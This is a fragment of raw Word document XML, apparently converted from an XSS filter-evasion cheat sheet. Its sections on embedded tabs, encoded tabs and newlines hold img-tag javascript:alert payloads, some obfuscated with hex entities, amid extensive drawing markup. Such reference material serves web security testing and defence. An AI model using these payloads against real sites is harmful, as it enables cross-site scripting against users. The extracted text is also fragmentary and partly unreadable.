                <v:shape id="Text Box 1324" o:spid="_x0000_s1115" type="#_x0000_t202" style="position:absolute;left:1614;top:177;width:49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Nap8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86aZapKZZRUoLQqE0xoPHMTtJ&#10;FrOzaXbV+O/dQqG3ebzPydaDbcWFem8cK3iaJiCIS6cN1wr2xcfkBYQPyBpbx6TgRh7Wq4dRhql2&#10;V87psgu1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zGcNvKWZIspEXDsaHBjt4aKk+7s1Ww&#10;OXD+bn6+jt95lZuiWCb8uTgpNX4cNq8gAg3hX/zn3uo4fz57ht9v4gl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zWqf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&lt;IMG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7"/>
        <w:rPr>
          <w:sz w:val="3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5563235" cy="116205"/>
                <wp:effectExtent l="5715" t="7620" r="3175" b="0"/>
                <wp:docPr id="1319" name="Group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3235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8761" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1320" name="Freeform 13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custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 8761"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 8761"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 8761"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 8761"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 8761"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 8761"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 8739 w 8761"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 8760 w 8761"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 8742 w 8761"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 8739 w 8761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761" h="183">
                                <a:moveTo>
                                  <a:pt x="873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739" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8760" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8742" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="87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" name="Text Box 13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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x5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20" o:spid="_x0000_s1116" style="width:438.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="876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">
                <v:shape id="Freeform 1322" o:spid="_x0000_s1117" style="position:absolute;width:8761;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="876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jasMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCQQyF74X+hyGF3uqsWkRWR7EFoSepqz8g7MTd&#10;xU1m2Jnq9t+bQ6G3hPfy3pf1duTe3GhIXRAH00kBhqQOvpPGwfm0f1uCSRnFYx+EHPxSgu3m+WmN&#10;pQ93OdKtyo3REEklOmhzjqW1qW6JMU1CJFHtEgbGrOvQWD/gXcO5t7OiWFjGTrShxUifLdXX6ocd&#10;2Bj5u37/KLiZX/lSpUN33pNzry/jbgUm05j/zX/XX17x5zPl1290BLt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AjasMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m8739,182l21,182r-3,l,161r,-3l,21,21,,8739,r21,21l8760,161r-18,21l8739,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8739,182;21,182;18,182;0,161;0,158;0,21;21,0;8739,0;8760,21;8760,161;8742,182;8739,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1321" o:spid="_x0000_s1118" type="#_x0000_t202" style="position:absolute;width:876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T5P8MA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TVUQrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fTSf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T5P8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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x5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2"/>
        <w:rPr>
          <w:sz w:val="7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956945" cy="116205"/>
                <wp:effectExtent l="5715" t="6350" r="8890" b="1270"/>
                <wp:docPr id="1316" name="Group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6945" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1507" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1317" name="Freeform 13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507" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 1486 w 1507"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 1507"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 1507"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 1507"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 1507"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 1507"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 1507"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 1486 w 1507"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 1507 w 1507"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 1507 w 1507"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 1489 w 1507"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 1486 w 1507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507" h="183">
                                <a:moveTo>
                                  <a:pt x="148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486" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1507" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1507" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1489" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148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8" name="Text Box 13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50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3&amp;#x53&amp;#x27&amp;#x29&gt;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17" o:spid="_x0000_s1119" style="width:75.35pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="150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">
                <v:shape id="Freeform 1319" o:spid="_x0000_s1120" style="position:absolute;width:1507;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="150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swu8QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywje6sYHtaSuIkKoByn4AK+T7DRJ&#10;k50Nu1uN/94tFLzNx/ec5bo3rbiS87VlBZNxAoK4sLrmUsH5lL2+g/ABWWNrmRTcycN6NXhZYqrt&#10;jQ90PYZSxBD2KSqoQuhSKX1RkUE/th1x5L6tMxgidKXUDm8x3LRymiRv0mDNsaHCjrYVFc3x1yg4&#10;NIuLm+/z80+Tf2Ubvc8z/MyVGg37zQeIQH14iv/dOx3nzyYL+Psmni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7MLvEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1486,182l21,182r-3,l,161r,-3l,21,21,,1486,r21,21l1507,161r-18,21l1486,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1486,182;21,182;18,182;0,161;0,158;0,21;21,0;1486,0;1507,21;1507,161;1489,182;1486,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1318" o:spid="_x0000_s1121" type="#_x0000_t202" style="position:absolute;width:150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KaH8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzJCb7rRgtjoKlIqCIXSmB56nGbH&#10;ZDE7m2ZXTf9951DwNsN789436+3gW3WlPrrABmbTDBRxFazj2sBnuZ8sQcWEbLENTAZ+KcJ28zBa&#10;Y27DjQu6HlOtJIRjjgaalLpc61g15DFOQ0cs2in0HpOsfa1tjzcJ962eZ9lCe3QsDQ129NJQdT5e&#10;vIHdFxev7uf9+6M4Fa4snzN+W5yNeRwPuxWoREO6m/+vD1bwn2aCK9/ICHr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KaH8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3&amp;#x53&amp;#x27&amp;#x29&gt;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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="101"/>
      </w:pPr>
      <w:r>
        <w:t>Embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Used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break</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>up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cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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151765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2029460" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1313" name="Group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9460" cy="116205"/>
                          <a:chOff x="1614" y="239"/>
                          <a:chExt cx="3196" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1314" name="Freeform 1316"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="3196" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4789 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3196"/>
                              <a:gd name="T2" fmla="+- 0 422 239"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3196"/>
                              <a:gd name="T6" fmla="+- 0 422 239"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3196"/>
                              <a:gd name="T10" fmla="+- 0 421 239"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3196"/>
                              <a:gd name="T14" fmla="+- 0 401 239"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3196"/>
                              <a:gd name="T18" fmla="+- 0 397 239"/>
                              <a:gd name="T19" fmla="*/ 397 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3196"/>
                              <a:gd name="T22" fmla="+- 0 261 239"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3196"/>
                              <a:gd name="T26" fmla="+- 0 239 239"/>
                              <a:gd name="T27" fmla="*/ 239 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4789 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3196"/>
                              <a:gd name="T30" fmla="+- 0 239 239"/>
                              <a:gd name="T31" fmla="*/ 239 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4810 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3196"/>
                              <a:gd name="T34" fmla="+- 0 261 239"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4810 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3196"/>
                              <a:gd name="T38" fmla="+- 0 401 239"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4792 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3196"/>
                              <a:gd name="T42" fmla="+- 0 421 239"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4789 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3196"/>
                              <a:gd name="T46" fmla="+- 0 422 239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196" h="183">
                                <a:moveTo>
                                  <a:pt x="317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3175" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3196" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3196" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3178" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="317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" name="Text Box 1315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39"/>
                            <a:ext cx="319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SRC="jav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ascript:alert('XSS');"&gt;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14" o:spid="_x0000_s1122" style="position:absolute;margin-left:80.7pt;margin-top:11.95pt;width:159.8pt;height:9.15pt;z-index:-15711744;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,239" coordsize="319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">
                <v:shape id="Freeform 1316" o:spid="_x0000_s1123" style="position:absolute;left:1614;top:239;width:3196;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="319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swycUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP22rCQBB9L/gPywi+1Y1aikZX0UhLoVTwAr6O2TEJ&#10;ZmdDdo3Rr3cLhb7N4VxntmhNKRqqXWFZwaAfgSBOrS44U3DYf7yOQTiPrLG0TAru5GAx77zMMNb2&#10;xltqdj4TIYRdjApy76tYSpfmZND1bUUcuLOtDfoA60zqGm8h3JRyGEXv0mDBoSHHipKc0svuahQc&#10;v8fn5qEnycFuRj+X032VrD+3SvW67XIKwlPr/8V/7i8d5o8Gb/D7TThB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CzDJxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3175,183l21,183r-3,-1l,162r,-4l,22,21,,3175,r21,22l3196,162r-18,20l3175,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3175,422;21,422;18,421;0,401;0,397;0,261;21,239;3175,239;3196,261;3196,401;3178,421;3175,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1315" o:spid="_x0000_s1124" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:319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M1gcQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywi91Y0tlRqziohCoVAa48HjmJ0k&#10;i9nZNLvV+O/dQqG3ebzPyVaDbcWFem8cK5hOEhDEpdOGawWHYvf0BsIHZI2tY1JwIw+r5eghw1S7&#10;K+d02YdaxBD2KSpoQuhSKX3ZkEU/cR1x5CrXWwwR9rXUPV5juG3lc5LMpEXDsaHBjjYNlef9j1Ww&#10;PnK+Nd+fp6+8yk1RzBP+mJ2VehwP6wWIQEP4F/+533Wc/zJ9hd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TNYH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4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SRC="jav</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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ascript:alert('XSS');"&gt;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Embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tab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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Use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break</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2291715" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1310" name="Group 1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1715" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="3609" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1311" name="Freeform 1313"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="3609" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5202 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3609"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3609"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3609"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3609"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3609"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3609"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3609"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5202 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3609"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5223 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3609"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5223 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3609"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5205 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3609"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5202 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3609"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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609" h="183">
                                <a:moveTo>
                                  <a:pt x="358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588" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3609" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3591" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="358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Text Box 1312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2"/>
                            <a:ext cx="360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SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;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11" o:spid="_x0000_s1125" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:180.45pt;height:9.15pt;z-index:-15711232;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="360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">
                <v:shape id="Freeform 1313" o:spid="_x0000_s1126" style="position:absolute;left:1614;top:252;width:3609;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="360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MTVcUA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS81c1WKJK6CaIWiuChsYV6G7Jj&#10;Es3OhuxWY399Vyh4m8f7nHk+2FacqfeNYw1qkoAgLp1puNLwuXt7moHwAdlg65g0XMlDnj2M5pga&#10;d+EPOhehEjGEfYoa6hC6VEpf1mTRT1xHHLmD6y2GCPtKmh4vMdy28jlJXqTFhmNDjR0taypPxY/V&#10;sFd8XKvfzbcr7Ga1bbv112J10nr8OCxeQQQawl387343cf5UKbh9E0+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4xNVxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m3588,182l21,182r-3,l,161r,-3l,21,21,,3588,r21,21l3609,161r-18,21l3588,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3588,434;21,434;18,434;0,413;0,410;0,273;21,252;3588,252;3609,273;3609,413;3591,434;3588,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1312" o:spid="_x0000_s1127" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:360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qt9cMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMII3TVUQrUaRRWFBWLZ2D3scm7EN&#10;NpNuk9X67zcLgrd5vM9Zbztbixu13jhWMBknIIgLpw2XCr7yw2gBwgdkjbVjUvAgD9tNv7fGVLs7&#10;Z3Q7hVLEEPYpKqhCaFIpfVGRRT92DXHkLq61GCJsS6lbvMdwW8tpksylRcOxocKG3ioqrqdfq2D3&#10;zdne/HycP7NLZvJ8mfBxflVqOOh2KxCBuvASP93vOs6fTab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qt9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7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SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;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Embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Newline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Break-up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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72" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="201"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>websites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>claim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chars</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>09-13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(decimal)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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attack.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incorrect.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(horizontal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tab),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(newline)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13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(carriage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>return)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>work.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9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ascii</w:t>
